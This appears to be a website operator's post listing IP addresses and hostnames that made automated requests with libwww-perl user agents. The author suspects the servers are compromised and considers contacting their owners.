194.152.183.230 [unknown] requested 19 pages as "libwww-perl/5.805"
64.8.114.12 [64-8-114-12.yourhostingprovider.net.] requested 67 pages as "libwww-perl/5.801"
207.158.61.3 [ns1.control8.com.] requested 77 pages as "libwww-perl/5.79"
85.214.19.18 [copyworld-kiel.de.] requested 25 pages as "libwww-perl/5.69"
62.4.70.180 [62.4.70.180.fantasyvirtual.com.] requested 35 pages as "libwww-perl/5.803"
203.146.140.221 [unknown] requested 12 pages as "libwww-perl/5.64"
89.108.80.229 [server2.vlr.ru.] requested 40 pages as "libwww-perl/5.805"
207.99.63.90 [www.myonlinephotos.net.] requested 31 pages as "libwww-perl/5.79"
203.167.111.133 [133.111.167.203.assigned.static.eastern-tele.com.] requested 11 pages as "libwww-perl/5.79"
81.183.219.157 [dsl51B7DB9D.fixip.t-online.hu.] requested 12 pages as "libwww-perl/5.803"
62.221.213.68 [unknown] requested 9 pages as "libwww-perl/5.65"
88.149.156.142 [www.futurweb.info.] requested 24 pages as "libwww-perl/5.803"
220.134.22.185 [main.ethantw.tw.] requested 17 pages as "libwww-perl/5.805"
140.117.73.1 [finance.nsysu.edu.tw.] requested 9 pages as "libwww-perl/5.805"
81.181.89.42 [cipnet.is.ew.ro.] requested 30 pages as "libwww-perl/5.805"
203.167.88.76 [unknown] requested 14 pages as "libwww-perl/5.65"
195.242.211.253 [faq.ecobike.de.] requested 24 pages as "libwww-perl/5.48"
82.210.7.28 [82.210.7.28.rev.worldbone.de.] requested 29 pages as "libwww-perl/5.803"


Maybe it's time I send a few letters to the owners of these compromised servers and see what happens.